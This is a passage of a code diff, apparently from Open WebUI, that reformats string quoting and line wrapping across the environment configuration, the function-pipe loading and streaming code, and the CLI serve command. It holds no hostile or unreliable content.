os.environ.get('SENTENCE_TRANSFORMERS_CROSS_ENCODER_SIGMOID_ACTIVATION_FUNCTION', 'True').lower() == 'true' ) #################################### # OFFLINE_MODE #################################### -ENABLE_VERSION_UPDATE_CHECK = ( - os.environ.get("ENABLE_VERSION_UPDATE_CHECK", "true").lower() == "true" -) -OFFLINE_MODE = os.environ.get("OFFLINE_MODE", "false").lower() == "true" +ENABLE_VERSION_UPDATE_CHECK = os.environ.get('ENABLE_VERSION_UPDATE_CHECK', 'true').lower() == 'true' +OFFLINE_MODE = os.environ.get('OFFLINE_MODE', 'false').lower() == 'true' if OFFLINE_MODE: - os.environ["HF_HUB_OFFLINE"] = "1" + os.environ['HF_HUB_OFFLINE'] = '1' ENABLE_VERSION_UPDATE_CHECK = False #################################### # AUDIT LOGGING #################################### -ENABLE_AUDIT_STDOUT = os.getenv("ENABLE_AUDIT_STDOUT", "False").lower() == "true" -ENABLE_AUDIT_LOGS_FILE = os.getenv("ENABLE_AUDIT_LOGS_FILE", "True").lower() == "true" +ENABLE_AUDIT_STDOUT = os.getenv('ENABLE_AUDIT_STDOUT', 'False').lower() == 'true' +ENABLE_AUDIT_LOGS_FILE = os.getenv('ENABLE_AUDIT_LOGS_FILE', 'True').lower() == 'true' # Where to store log file # Defaults to the DATA_DIR/audit.log. 
To set AUDIT_LOGS_FILE_PATH you need to # provide the whole path, like: /app/audit.log -AUDIT_LOGS_FILE_PATH = os.getenv("AUDIT_LOGS_FILE_PATH", f"{DATA_DIR}/audit.log") +AUDIT_LOGS_FILE_PATH = os.getenv('AUDIT_LOGS_FILE_PATH', f'{DATA_DIR}/audit.log') # Maximum size of a file before rotating into a new log file -AUDIT_LOG_FILE_ROTATION_SIZE = os.getenv("AUDIT_LOG_FILE_ROTATION_SIZE", "10MB") +AUDIT_LOG_FILE_ROTATION_SIZE = os.getenv('AUDIT_LOG_FILE_ROTATION_SIZE', '10MB') # Comma separated list of logger names to use for audit logging # Default is "uvicorn.access" which is the access log for Uvicorn # You can add more logger names to this list if you want to capture more logs -AUDIT_UVICORN_LOGGER_NAMES = os.getenv( - "AUDIT_UVICORN_LOGGER_NAMES", "uvicorn.access" -).split(",") +AUDIT_UVICORN_LOGGER_NAMES = os.getenv('AUDIT_UVICORN_LOGGER_NAMES', 'uvicorn.access').split(',') # METADATA | REQUEST | REQUEST_RESPONSE -AUDIT_LOG_LEVEL = os.getenv("AUDIT_LOG_LEVEL", "NONE").upper() +AUDIT_LOG_LEVEL = os.getenv('AUDIT_LOG_LEVEL', 'NONE').upper() try: - MAX_BODY_LOG_SIZE = int(os.environ.get("MAX_BODY_LOG_SIZE") or 2048) + MAX_BODY_LOG_SIZE = int(os.environ.get('MAX_BODY_LOG_SIZE') or 2048) except ValueError: MAX_BODY_LOG_SIZE = 2048 # Comma separated list for urls to exclude from audit -AUDIT_EXCLUDED_PATHS = os.getenv("AUDIT_EXCLUDED_PATHS", "/chats,/chat,/folders").split( - "," -) +AUDIT_EXCLUDED_PATHS = os.getenv('AUDIT_EXCLUDED_PATHS', '/chats,/chat,/folders').split(',') AUDIT_EXCLUDED_PATHS = [path.strip() for path in AUDIT_EXCLUDED_PATHS] -AUDIT_EXCLUDED_PATHS = [path.lstrip("/") for path in AUDIT_EXCLUDED_PATHS] +AUDIT_EXCLUDED_PATHS = [path.lstrip('/') for path in AUDIT_EXCLUDED_PATHS] # Comma separated list of urls to include in audit (whitelist mode) # When set, only these paths are audited and AUDIT_EXCLUDED_PATHS is ignored -AUDIT_INCLUDED_PATHS = os.getenv("AUDIT_INCLUDED_PATHS", "").split(",") +AUDIT_INCLUDED_PATHS = os.getenv('AUDIT_INCLUDED_PATHS', '').split(',') AUDIT_INCLUDED_PATHS = [path.strip() for path in AUDIT_INCLUDED_PATHS] -AUDIT_INCLUDED_PATHS = [path.lstrip("/") for path in AUDIT_INCLUDED_PATHS if path] +AUDIT_INCLUDED_PATHS = [path.lstrip('/') for path in AUDIT_INCLUDED_PATHS if path] #################################### # OPENTELEMETRY #################################### -ENABLE_OTEL = os.environ.get("ENABLE_OTEL", "False").lower() == "true" -ENABLE_OTEL_TRACES = os.environ.get("ENABLE_OTEL_TRACES", "False").lower() == "true" -ENABLE_OTEL_METRICS = os.environ.get("ENABLE_OTEL_METRICS", "False").lower() == "true" -ENABLE_OTEL_LOGS = os.environ.get("ENABLE_OTEL_LOGS", "False").lower() == "true" +ENABLE_OTEL = os.environ.get('ENABLE_OTEL', 'False').lower() == 'true' +ENABLE_OTEL_TRACES = os.environ.get('ENABLE_OTEL_TRACES', 'False').lower() == 'true' +ENABLE_OTEL_METRICS = os.environ.get('ENABLE_OTEL_METRICS', 'False').lower() == 'true' +ENABLE_OTEL_LOGS = os.environ.get('ENABLE_OTEL_LOGS', 'False').lower() == 'true' -OTEL_EXPORTER_OTLP_ENDPOINT = os.environ.get( - "OTEL_EXPORTER_OTLP_ENDPOINT", "http://localhost:4317" -) -OTEL_METRICS_EXPORTER_OTLP_ENDPOINT = os.environ.get( - "OTEL_METRICS_EXPORTER_OTLP_ENDPOINT", OTEL_EXPORTER_OTLP_ENDPOINT -) -OTEL_LOGS_EXPORTER_OTLP_ENDPOINT = os.environ.get( - "OTEL_LOGS_EXPORTER_OTLP_ENDPOINT", OTEL_EXPORTER_OTLP_ENDPOINT -) -OTEL_EXPORTER_OTLP_INSECURE = ( - os.environ.get("OTEL_EXPORTER_OTLP_INSECURE", "False").lower() == "true" -) +OTEL_EXPORTER_OTLP_ENDPOINT = os.environ.get('OTEL_EXPORTER_OTLP_ENDPOINT', 
####################################
# OPENTELEMETRY
####################################

-ENABLE_OTEL = os.environ.get("ENABLE_OTEL", "False").lower() == "true"
-ENABLE_OTEL_TRACES = os.environ.get("ENABLE_OTEL_TRACES", "False").lower() == "true"
-ENABLE_OTEL_METRICS = os.environ.get("ENABLE_OTEL_METRICS", "False").lower() == "true"
-ENABLE_OTEL_LOGS = os.environ.get("ENABLE_OTEL_LOGS", "False").lower() == "true"
+ENABLE_OTEL = os.environ.get('ENABLE_OTEL', 'False').lower() == 'true'
+ENABLE_OTEL_TRACES = os.environ.get('ENABLE_OTEL_TRACES', 'False').lower() == 'true'
+ENABLE_OTEL_METRICS = os.environ.get('ENABLE_OTEL_METRICS', 'False').lower() == 'true'
+ENABLE_OTEL_LOGS = os.environ.get('ENABLE_OTEL_LOGS', 'False').lower() == 'true'

-OTEL_EXPORTER_OTLP_ENDPOINT = os.environ.get(
-    "OTEL_EXPORTER_OTLP_ENDPOINT", "http://localhost:4317"
-)
-OTEL_METRICS_EXPORTER_OTLP_ENDPOINT = os.environ.get(
-    "OTEL_METRICS_EXPORTER_OTLP_ENDPOINT", OTEL_EXPORTER_OTLP_ENDPOINT
-)
-OTEL_LOGS_EXPORTER_OTLP_ENDPOINT = os.environ.get(
-    "OTEL_LOGS_EXPORTER_OTLP_ENDPOINT", OTEL_EXPORTER_OTLP_ENDPOINT
-)
-OTEL_EXPORTER_OTLP_INSECURE = (
-    os.environ.get("OTEL_EXPORTER_OTLP_INSECURE", "False").lower() == "true"
-)
+OTEL_EXPORTER_OTLP_ENDPOINT = os.environ.get('OTEL_EXPORTER_OTLP_ENDPOINT', 'http://localhost:4317')
+OTEL_METRICS_EXPORTER_OTLP_ENDPOINT = os.environ.get('OTEL_METRICS_EXPORTER_OTLP_ENDPOINT', OTEL_EXPORTER_OTLP_ENDPOINT)
+OTEL_LOGS_EXPORTER_OTLP_ENDPOINT = os.environ.get('OTEL_LOGS_EXPORTER_OTLP_ENDPOINT', OTEL_EXPORTER_OTLP_ENDPOINT)
+OTEL_EXPORTER_OTLP_INSECURE = os.environ.get('OTEL_EXPORTER_OTLP_INSECURE', 'False').lower() == 'true'
 OTEL_METRICS_EXPORTER_OTLP_INSECURE = (
-    os.environ.get(
-        "OTEL_METRICS_EXPORTER_OTLP_INSECURE", str(OTEL_EXPORTER_OTLP_INSECURE)
-    ).lower()
-    == "true"
+    os.environ.get('OTEL_METRICS_EXPORTER_OTLP_INSECURE', str(OTEL_EXPORTER_OTLP_INSECURE)).lower() == 'true'
 )
 OTEL_LOGS_EXPORTER_OTLP_INSECURE = (
-    os.environ.get(
-        "OTEL_LOGS_EXPORTER_OTLP_INSECURE", str(OTEL_EXPORTER_OTLP_INSECURE)
-    ).lower()
-    == "true"
-)
-OTEL_SERVICE_NAME = os.environ.get("OTEL_SERVICE_NAME", "open-webui")
-OTEL_RESOURCE_ATTRIBUTES = os.environ.get(
-    "OTEL_RESOURCE_ATTRIBUTES", ""
-)  # e.g. key1=val1,key2=val2
-OTEL_TRACES_SAMPLER = os.environ.get(
-    "OTEL_TRACES_SAMPLER", "parentbased_always_on"
-).lower()
-OTEL_BASIC_AUTH_USERNAME = os.environ.get("OTEL_BASIC_AUTH_USERNAME", "")
-OTEL_BASIC_AUTH_PASSWORD = os.environ.get("OTEL_BASIC_AUTH_PASSWORD", "")
-OTEL_METRICS_EXPORT_INTERVAL_MILLIS = int(
-    os.environ.get("OTEL_METRICS_EXPORT_INTERVAL_MILLIS", "10000")
+    os.environ.get('OTEL_LOGS_EXPORTER_OTLP_INSECURE', str(OTEL_EXPORTER_OTLP_INSECURE)).lower() == 'true'
 )
+OTEL_SERVICE_NAME = os.environ.get('OTEL_SERVICE_NAME', 'open-webui')
+OTEL_RESOURCE_ATTRIBUTES = os.environ.get('OTEL_RESOURCE_ATTRIBUTES', '')  # e.g. key1=val1,key2=val2
+OTEL_TRACES_SAMPLER = os.environ.get('OTEL_TRACES_SAMPLER', 'parentbased_always_on').lower()
+OTEL_BASIC_AUTH_USERNAME = os.environ.get('OTEL_BASIC_AUTH_USERNAME', '')
+OTEL_BASIC_AUTH_PASSWORD = os.environ.get('OTEL_BASIC_AUTH_PASSWORD', '')
+OTEL_METRICS_EXPORT_INTERVAL_MILLIS = int(os.environ.get('OTEL_METRICS_EXPORT_INTERVAL_MILLIS', '10000'))

-OTEL_METRICS_BASIC_AUTH_USERNAME = os.environ.get(
-    "OTEL_METRICS_BASIC_AUTH_USERNAME", OTEL_BASIC_AUTH_USERNAME
-)
-OTEL_METRICS_BASIC_AUTH_PASSWORD = os.environ.get(
-    "OTEL_METRICS_BASIC_AUTH_PASSWORD", OTEL_BASIC_AUTH_PASSWORD
-)
-OTEL_LOGS_BASIC_AUTH_USERNAME = os.environ.get(
-    "OTEL_LOGS_BASIC_AUTH_USERNAME", OTEL_BASIC_AUTH_USERNAME
-)
-OTEL_LOGS_BASIC_AUTH_PASSWORD = os.environ.get(
-    "OTEL_LOGS_BASIC_AUTH_PASSWORD", OTEL_BASIC_AUTH_PASSWORD
-)
+OTEL_METRICS_BASIC_AUTH_USERNAME = os.environ.get('OTEL_METRICS_BASIC_AUTH_USERNAME', OTEL_BASIC_AUTH_USERNAME)
+OTEL_METRICS_BASIC_AUTH_PASSWORD = os.environ.get('OTEL_METRICS_BASIC_AUTH_PASSWORD', OTEL_BASIC_AUTH_PASSWORD)
+OTEL_LOGS_BASIC_AUTH_USERNAME = os.environ.get('OTEL_LOGS_BASIC_AUTH_USERNAME', OTEL_BASIC_AUTH_USERNAME)
+OTEL_LOGS_BASIC_AUTH_PASSWORD = os.environ.get('OTEL_LOGS_BASIC_AUTH_PASSWORD', OTEL_BASIC_AUTH_PASSWORD)

-OTEL_OTLP_SPAN_EXPORTER = os.environ.get(
-    "OTEL_OTLP_SPAN_EXPORTER", "grpc"
-).lower()  # grpc or http
+OTEL_OTLP_SPAN_EXPORTER = os.environ.get('OTEL_OTLP_SPAN_EXPORTER', 'grpc').lower()  # grpc or http
 OTEL_METRICS_OTLP_SPAN_EXPORTER = os.environ.get(
-    "OTEL_METRICS_OTLP_SPAN_EXPORTER", OTEL_OTLP_SPAN_EXPORTER
+    'OTEL_METRICS_OTLP_SPAN_EXPORTER', OTEL_OTLP_SPAN_EXPORTER
 ).lower()  # grpc or http
 OTEL_LOGS_OTLP_SPAN_EXPORTER = os.environ.get(
-    "OTEL_LOGS_OTLP_SPAN_EXPORTER", OTEL_OTLP_SPAN_EXPORTER
+    'OTEL_LOGS_OTLP_SPAN_EXPORTER', OTEL_OTLP_SPAN_EXPORTER
 ).lower()  # grpc or http
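Each OTLP signal (traces, metrics, logs) reads its own endpoint, insecure flag, basic-auth pair, and transport, and every per-signal value defaults to the shared OTEL_* setting. So pointing everything at one collector while overriding only metrics could look like this (illustrative environment values, not from the patch):

import os

os.environ['OTEL_EXPORTER_OTLP_ENDPOINT'] = 'http://otel-collector:4317'
os.environ['OTEL_METRICS_EXPORTER_OTLP_ENDPOINT'] = 'http://metrics-gw:4317'
# Logs inherit the shared endpoint because no per-signal override is set:
logs_endpoint = os.environ.get(
    'OTEL_LOGS_EXPORTER_OTLP_ENDPOINT',
    os.environ['OTEL_EXPORTER_OTLP_ENDPOINT'],
)
assert logs_endpoint == 'http://otel-collector:4317'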
####################################
# TOOLS/FUNCTIONS PIP OPTIONS
####################################

 ENABLE_PIP_INSTALL_FRONTMATTER_REQUIREMENTS = (
-    os.environ.get("ENABLE_PIP_INSTALL_FRONTMATTER_REQUIREMENTS", "True").lower()
-    == "true"
+    os.environ.get('ENABLE_PIP_INSTALL_FRONTMATTER_REQUIREMENTS', 'True').lower() == 'true'
 )
-PIP_OPTIONS = os.getenv("PIP_OPTIONS", "").split()
-PIP_PACKAGE_INDEX_OPTIONS = os.getenv("PIP_PACKAGE_INDEX_OPTIONS", "").split()
+PIP_OPTIONS = os.getenv('PIP_OPTIONS', '').split()
+PIP_PACKAGE_INDEX_OPTIONS = os.getenv('PIP_PACKAGE_INDEX_OPTIONS', '').split()

####################################
# PROGRESSIVE WEB APP OPTIONS
####################################

-EXTERNAL_PWA_MANIFEST_URL = os.environ.get("EXTERNAL_PWA_MANIFEST_URL")
+EXTERNAL_PWA_MANIFEST_URL = os.environ.get('EXTERNAL_PWA_MANIFEST_URL')

####################################
# GROUP DEFAULTS
####################################

 # Controls the default "Who can share to this group" setting for new groups.
 # Env var values: "true" (anyone), "false" (no one), "members" (only group members).
-_default_group_share = (
-    os.environ.get("DEFAULT_GROUP_SHARE_PERMISSION", "members").strip().lower()
-)
-DEFAULT_GROUP_SHARE_PERMISSION = (
-    "members" if _default_group_share == "members" else _default_group_share == "true"
-)
+_default_group_share = os.environ.get('DEFAULT_GROUP_SHARE_PERMISSION', 'members').strip().lower()
+DEFAULT_GROUP_SHARE_PERMISSION = 'members' if _default_group_share == 'members' else _default_group_share == 'true'
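Note that DEFAULT_GROUP_SHARE_PERMISSION is deliberately mixed-type: it ends up as either the string 'members' or a boolean. A consumer-side check might plausibly look like this (assumed shape; the patch does not show the consumer):

def can_share_to_group(permission, is_member: bool) -> bool:
    if permission == 'members':
        return is_member          # only group members may share
    return bool(permission)       # True: anyone; False: no one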
backend/open_webui/functions.py  +85 −95  modified

@@ -57,17 +57,15 @@ def get_function_module_by_id(request: Request, pipe_id: str):
     function_module, _, _ = get_function_module_from_cache(request, pipe_id)

-    if hasattr(function_module, "valves") and hasattr(function_module, "Valves"):
+    if hasattr(function_module, 'valves') and hasattr(function_module, 'Valves'):
         Valves = function_module.Valves
         valves = Functions.get_function_valves_by_id(pipe_id)
         if valves:
             try:
-                function_module.valves = Valves(
-                    **{k: v for k, v in valves.items() if v is not None}
-                )
+                function_module.valves = Valves(**{k: v for k, v in valves.items() if v is not None})
             except Exception as e:
-                log.exception(f"Error loading valves for function {pipe_id}: {e}")
+                log.exception(f'Error loading valves for function {pipe_id}: {e}')
                 raise e
         else:
             function_module.valves = Valves()

@@ -76,19 +74,19 @@ def get_function_module_by_id(request: Request, pipe_id: str):

 async def get_function_models(request):
-    pipes = Functions.get_functions_by_type("pipe", active_only=True)
+    pipes = Functions.get_functions_by_type('pipe', active_only=True)
     pipe_models = []

     for pipe in pipes:
         try:
             function_module = get_function_module_by_id(request, pipe.id)

             has_user_valves = False
-            if hasattr(function_module, "UserValves"):
+            if hasattr(function_module, 'UserValves'):
                 has_user_valves = True

             # Check if function is a manifold
-            if hasattr(function_module, "pipes"):
+            if hasattr(function_module, 'pipes'):
                 sub_pipes = []

                 # Handle pipes being a list, sync function, or async function
@@ -104,46 +102,44 @@ async def get_function_models(request):
                     log.exception(e)
                     sub_pipes = []

-                log.debug(
-                    f"get_function_models: function '{pipe.id}' is a manifold of {sub_pipes}"
-                )
+                log.debug(f"get_function_models: function '{pipe.id}' is a manifold of {sub_pipes}")

                 for p in sub_pipes:
                     sub_pipe_id = f'{pipe.id}.{p["id"]}'
-                    sub_pipe_name = p["name"]
+                    sub_pipe_name = p['name']

-                    if hasattr(function_module, "name"):
-                        sub_pipe_name = f"{function_module.name}{sub_pipe_name}"
+                    if hasattr(function_module, 'name'):
+                        sub_pipe_name = f'{function_module.name}{sub_pipe_name}'

-                    pipe_flag = {"type": pipe.type}
+                    pipe_flag = {'type': pipe.type}

                     pipe_models.append(
                         {
-                            "id": sub_pipe_id,
-                            "name": sub_pipe_name,
-                            "object": "model",
-                            "created": pipe.created_at,
-                            "owned_by": "openai",
-                            "pipe": pipe_flag,
-                            "has_user_valves": has_user_valves,
+                            'id': sub_pipe_id,
+                            'name': sub_pipe_name,
+                            'object': 'model',
+                            'created': pipe.created_at,
+                            'owned_by': 'openai',
+                            'pipe': pipe_flag,
+                            'has_user_valves': has_user_valves,
                         }
                     )
             else:
-                pipe_flag = {"type": "pipe"}
+                pipe_flag = {'type': 'pipe'}

                 log.debug(
                     f"get_function_models: function '{pipe.id}' is a single pipe {{ 'id': {pipe.id}, 'name': {pipe.name} }}"
                 )

                 pipe_models.append(
                     {
-                        "id": pipe.id,
-                        "name": pipe.name,
-                        "object": "model",
-                        "created": pipe.created_at,
-                        "owned_by": "openai",
-                        "pipe": pipe_flag,
-                        "has_user_valves": has_user_valves,
+                        'id': pipe.id,
+                        'name': pipe.name,
+                        'object': 'model',
+                        'created': pipe.created_at,
+                        'owned_by': 'openai',
+                        'pipe': pipe_flag,
+                        'has_user_valves': has_user_valves,
                     }
                 )
         except Exception as e:
@@ -153,9 +149,7 @@ async def get_function_models(request):
     return pipe_models

-async def generate_function_chat_completion(
-    request, form_data, user, models: dict = {}
-):
+async def generate_function_chat_completion(request, form_data, user, models: dict = {}):
     async def execute_pipe(pipe, params):
         if inspect.iscoroutinefunction(pipe):
             return await pipe(**params)

@@ -166,32 +160,32 @@
     async def get_message_content(res: str | Generator | AsyncGenerator) -> str:
         if isinstance(res, str):
             return res
         if isinstance(res, Generator):
-            return "".join(map(str, res))
+            return ''.join(map(str, res))
         if isinstance(res, AsyncGenerator):
-            return "".join([str(stream) async for stream in res])
+            return ''.join([str(stream) async for stream in res])

     def process_line(form_data: dict, line):
         if isinstance(line, BaseModel):
             line = line.model_dump_json()
-            line = f"data: {line}"
+            line = f'data: {line}'
         if isinstance(line, dict):
-            line = f"data: {json.dumps(line)}"
+            line = f'data: {json.dumps(line)}'

         try:
-            line = line.decode("utf-8")
+            line = line.decode('utf-8')
         except Exception:
             pass

-        if line.startswith("data:"):
-            return f"{line}\n\n"
+        if line.startswith('data:'):
+            return f'{line}\n\n'
         else:
-            line = openai_chat_chunk_message_template(form_data["model"], line)
-            return f"data: {json.dumps(line)}\n\n"
+            line = openai_chat_chunk_message_template(form_data['model'], line)
+            return f'data: {json.dumps(line)}\n\n'

     def get_pipe_id(form_data: dict) -> str:
-        pipe_id = form_data["model"]
-        if "." in pipe_id:
-            pipe_id, _ = pipe_id.split(".", 1)
+        pipe_id = form_data['model']
+        if '.' in pipe_id:
+            pipe_id, _ = pipe_id.split('.', 1)
         return pipe_id

     def get_function_params(function_module, form_data, user, extra_params=None):
@@ -202,27 +196,25 @@ def get_function_params(function_module, form_data, user, extra_params=None):
         # Get the signature of the function
         sig = inspect.signature(function_module.pipe)

-        params = {"body": form_data} | {
-            k: v for k, v in extra_params.items() if k in sig.parameters
-        }
+        params = {'body': form_data} | {k: v for k, v in extra_params.items() if k in sig.parameters}

-        if "__user__" in params and hasattr(function_module, "UserValves"):
+        if '__user__' in params and hasattr(function_module, 'UserValves'):
            user_valves = Functions.get_user_valves_by_id_and_user_id(pipe_id, user.id)
            try:
-                params["__user__"]["valves"] = function_module.UserValves(**user_valves)
+                params['__user__']['valves'] = function_module.UserValves(**user_valves)
            except Exception as e:
                log.exception(e)
-                params["__user__"]["valves"] = function_module.UserValves()
+                params['__user__']['valves'] = function_module.UserValves()

         return params

-    model_id = form_data.get("model")
+    model_id = form_data.get('model')
     model_info = Models.get_model_by_id(model_id)
-    metadata = form_data.pop("metadata", {})
+    metadata = form_data.pop('metadata', {})

-    files = metadata.get("files", [])
-    tool_ids = metadata.get("tool_ids", [])
+    files = metadata.get('files', [])
+    tool_ids = metadata.get('tool_ids', [])
     # Check if tool_ids is None
     if tool_ids is None:
         tool_ids = []

@@ -233,56 +225,56 @@ def get_function_params(function_module, form_data, user, extra_params=None):
     __task_body__ = None

     if metadata:
-        if all(k in metadata for k in ("session_id", "chat_id", "message_id")):
+        if all(k in metadata for k in ('session_id', 'chat_id', 'message_id')):
             __event_emitter__ = get_event_emitter(metadata)
             __event_call__ = get_event_call(metadata)
-        __task__ = metadata.get("task", None)
-        __task_body__ = metadata.get("task_body", None)
+        __task__ = metadata.get('task', None)
+        __task_body__ = metadata.get('task_body', None)

     oauth_token = None
     try:
-        if request.cookies.get("oauth_session_id", None):
+        if request.cookies.get('oauth_session_id', None):
             oauth_token = await request.app.state.oauth_manager.get_oauth_token(
                 user.id,
-                request.cookies.get("oauth_session_id", None),
+                request.cookies.get('oauth_session_id', None),
             )
     except Exception as e:
-        log.error(f"Error getting OAuth token: {e}")
+        log.error(f'Error getting OAuth token: {e}')

     extra_params = {
-        "__event_emitter__": __event_emitter__,
-        "__event_call__": __event_call__,
-        "__chat_id__": metadata.get("chat_id", None),
-        "__session_id__": metadata.get("session_id", None),
-        "__message_id__": metadata.get("message_id", None),
-        "__task__": __task__,
-        "__task_body__": __task_body__,
-        "__files__": files,
-        "__user__": user.model_dump() if isinstance(user, UserModel) else {},
-        "__metadata__": metadata,
-        "__oauth_token__": oauth_token,
-        "__request__": request,
+        '__event_emitter__': __event_emitter__,
+        '__event_call__': __event_call__,
+        '__chat_id__': metadata.get('chat_id', None),
+        '__session_id__': metadata.get('session_id', None),
+        '__message_id__': metadata.get('message_id', None),
+        '__task__': __task__,
+        '__task_body__': __task_body__,
+        '__files__': files,
+        '__user__': user.model_dump() if isinstance(user, UserModel) else {},
+        '__metadata__': metadata,
+        '__oauth_token__': oauth_token,
+        '__request__': request,
     }

-    extra_params["__tools__"] = await get_tools(
+    extra_params['__tools__'] = await get_tools(
         request,
         tool_ids,
         user,
         {
             **extra_params,
-            "__model__": models.get(form_data["model"], None),
-            "__messages__": form_data["messages"],
-            "__files__": files,
+            '__model__': models.get(form_data['model'], None),
+            '__messages__': form_data['messages'],
+            '__files__': files,
         },
     )

     if model_info:
         if model_info.base_model_id:
-            form_data["model"] = model_info.base_model_id
+            form_data['model'] = model_info.base_model_id

         params = model_info.params.model_dump()
         if params:
-            system = params.pop("system", None)
+            system = params.pop('system', None)
             form_data = apply_model_params_to_body_openai(params, form_data)
             form_data = apply_system_prompt_to_body(system, form_data, metadata, user)

@@ -292,7 +284,7 @@ def get_function_params(function_module, form_data, user, extra_params=None):
     pipe = function_module.pipe
     params = get_function_params(function_module, form_data, user, extra_params)

-    if form_data.get("stream", False):
+    if form_data.get('stream', False):

         async def stream_content():
             try:
@@ -304,17 +296,17 @@ async def stream_content():
                     yield data
                     return
                 if isinstance(res, dict):
-                    yield f"data: {json.dumps(res)}\n\n"
+                    yield f'data: {json.dumps(res)}\n\n'
                     return
             except Exception as e:
-                log.error(f"Error: {e}")
-                yield f"data: {json.dumps({'error': {'detail':str(e)}})}\n\n"
+                log.error(f'Error: {e}')
+                yield f'data: {json.dumps({"error": {"detail": str(e)}})}\n\n'
                 return

             if isinstance(res, str):
-                message = openai_chat_chunk_message_template(form_data["model"], res)
-                yield f"data: {json.dumps(message)}\n\n"
+                message = openai_chat_chunk_message_template(form_data['model'], res)
+                yield f'data: {json.dumps(message)}\n\n'

             if isinstance(res, Iterator):
                 for line in res:
@@ -325,26 +317,24 @@ async def stream_content():
                     yield process_line(form_data, line)

             if isinstance(res, str) or isinstance(res, Generator):
-                finish_message = openai_chat_chunk_message_template(
-                    form_data["model"], ""
-                )
-                finish_message["choices"][0]["finish_reason"] = "stop"
-                yield f"data: {json.dumps(finish_message)}\n\n"
-                yield "data: [DONE]"
+                finish_message = openai_chat_chunk_message_template(form_data['model'], '')
+                finish_message['choices'][0]['finish_reason'] = 'stop'
+                yield f'data: {json.dumps(finish_message)}\n\n'
+                yield 'data: [DONE]'

-        return StreamingResponse(stream_content(), media_type="text/event-stream")
+        return StreamingResponse(stream_content(), media_type='text/event-stream')
     else:
         try:
             res = await execute_pipe(pipe, params)
         except Exception as e:
-            log.error(f"Error: {e}")
-            return {"error": {"detail": str(e)}}
+            log.error(f'Error: {e}')
+            return {'error': {'detail': str(e)}}

         if isinstance(res, StreamingResponse) or isinstance(res, dict):
             return res
         if isinstance(res, BaseModel):
             return res.model_dump()

         message = await get_message_content(res)
-        return openai_chat_completion_message_template(form_data["model"], message)
+        return openai_chat_completion_message_template(form_data['model'], message)
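The loader above resolves a function module, applies persisted Valves, and injects UserValves into __user__['valves'] before calling pipe(); only parameters present in pipe()'s signature are passed in. A minimal pipe function compatible with that flow might look like this (shape inferred from the calls in this diff; treat the field names and defaults as illustrative):

from pydantic import BaseModel

class Pipe:
    class Valves(BaseModel):
        api_base: str = 'http://localhost:11434'  # admin-level, persisted

    class UserValves(BaseModel):
        temperature: float = 0.7  # per-user, injected as __user__['valves']

    def __init__(self):
        self.valves = self.Valves()

    def pipe(self, body: dict, __user__: dict | None = None):
        # body is the OpenAI-style request; __user__ carries the caller's valves.
        temperature = __user__['valves'].temperature if __user__ else 0.7
        return f"(t={temperature}) {body['messages'][-1]['content']}"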
backend/open_webui/__init__.py  +29 −35  modified

@@ -10,94 +10,88 @@
 app = typer.Typer()

-KEY_FILE = Path.cwd() / ".webui_secret_key"
+KEY_FILE = Path.cwd() / '.webui_secret_key'

 def version_callback(value: bool):
     if value:
         from open_webui.env import VERSION

-        typer.echo(f"Open WebUI version: {VERSION}")
+        typer.echo(f'Open WebUI version: {VERSION}')
         raise typer.Exit()

 @app.command()
 def main(
-    version: Annotated[
-        Optional[bool], typer.Option("--version", callback=version_callback)
-    ] = None,
+    version: Annotated[Optional[bool], typer.Option('--version', callback=version_callback)] = None,
 ):
     pass

 @app.command()
 def serve(
-    host: str = "0.0.0.0",
+    host: str = '0.0.0.0',
     port: int = 8080,
 ):
-    os.environ["FROM_INIT_PY"] = "true"
-    if os.getenv("WEBUI_SECRET_KEY") is None:
-        typer.echo(
-            "Loading WEBUI_SECRET_KEY from file, not provided as an environment variable."
-        )
+    os.environ['FROM_INIT_PY'] = 'true'
+    if os.getenv('WEBUI_SECRET_KEY') is None:
+        typer.echo('Loading WEBUI_SECRET_KEY from file, not provided as an environment variable.')

         if not KEY_FILE.exists():
-            typer.echo(f"Generating a new secret key and saving it to {KEY_FILE}")
+            typer.echo(f'Generating a new secret key and saving it to {KEY_FILE}')
             KEY_FILE.write_bytes(base64.b64encode(random.randbytes(12)))

-        typer.echo(f"Loading WEBUI_SECRET_KEY from {KEY_FILE}")
-        os.environ["WEBUI_SECRET_KEY"] = KEY_FILE.read_text()
+        typer.echo(f'Loading WEBUI_SECRET_KEY from {KEY_FILE}')
+        os.environ['WEBUI_SECRET_KEY'] = KEY_FILE.read_text()

-    if os.getenv("USE_CUDA_DOCKER", "false") == "true":
-        typer.echo(
-            "CUDA is enabled, appending LD_LIBRARY_PATH to include torch/cudnn & cublas libraries."
-        )
-        LD_LIBRARY_PATH = os.getenv("LD_LIBRARY_PATH", "").split(":")
-        os.environ["LD_LIBRARY_PATH"] = ":".join(
+    if os.getenv('USE_CUDA_DOCKER', 'false') == 'true':
+        typer.echo('CUDA is enabled, appending LD_LIBRARY_PATH to include torch/cudnn & cublas libraries.')
+        LD_LIBRARY_PATH = os.getenv('LD_LIBRARY_PATH', '').split(':')
+        os.environ['LD_LIBRARY_PATH'] = ':'.join(
             LD_LIBRARY_PATH
             + [
-                "/usr/local/lib/python3.11/site-packages/torch/lib",
-                "/usr/local/lib/python3.11/site-packages/nvidia/cudnn/lib",
+                '/usr/local/lib/python3.11/site-packages/torch/lib',
+                '/usr/local/lib/python3.11/site-packages/nvidia/cudnn/lib',
             ]
         )
         try:
             import torch

-            assert torch.cuda.is_available(), "CUDA not available"
-            typer.echo("CUDA seems to be working")
+            assert torch.cuda.is_available(), 'CUDA not available'
+            typer.echo('CUDA seems to be working')
         except Exception as e:
             typer.echo(
-                "Error when testing CUDA but USE_CUDA_DOCKER is true. "
-                "Resetting USE_CUDA_DOCKER to false and removing "
-                f"LD_LIBRARY_PATH modifications: {e}"
+                'Error when testing CUDA but USE_CUDA_DOCKER is true. '
+                'Resetting USE_CUDA_DOCKER to false and removing '
+                f'LD_LIBRARY_PATH modifications: {e}'
             )
-            os.environ["USE_CUDA_DOCKER"] = "false"
-            os.environ["LD_LIBRARY_PATH"] = ":".join(LD_LIBRARY_PATH)
+            os.environ['USE_CUDA_DOCKER'] = 'false'
+            os.environ['LD_LIBRARY_PATH'] = ':'.join(LD_LIBRARY_PATH)

     import open_webui.main  # we need set environment variables before importing main
     from open_webui.env import UVICORN_WORKERS  # Import the workers setting

     uvicorn.run(
-        "open_webui.main:app",
+        'open_webui.main:app',
         host=host,
         port=port,
-        forwarded_allow_ips="*",
+        forwarded_allow_ips='*',
         workers=UVICORN_WORKERS,
     )

 @app.command()
 def dev(
-    host: str = "0.0.0.0",
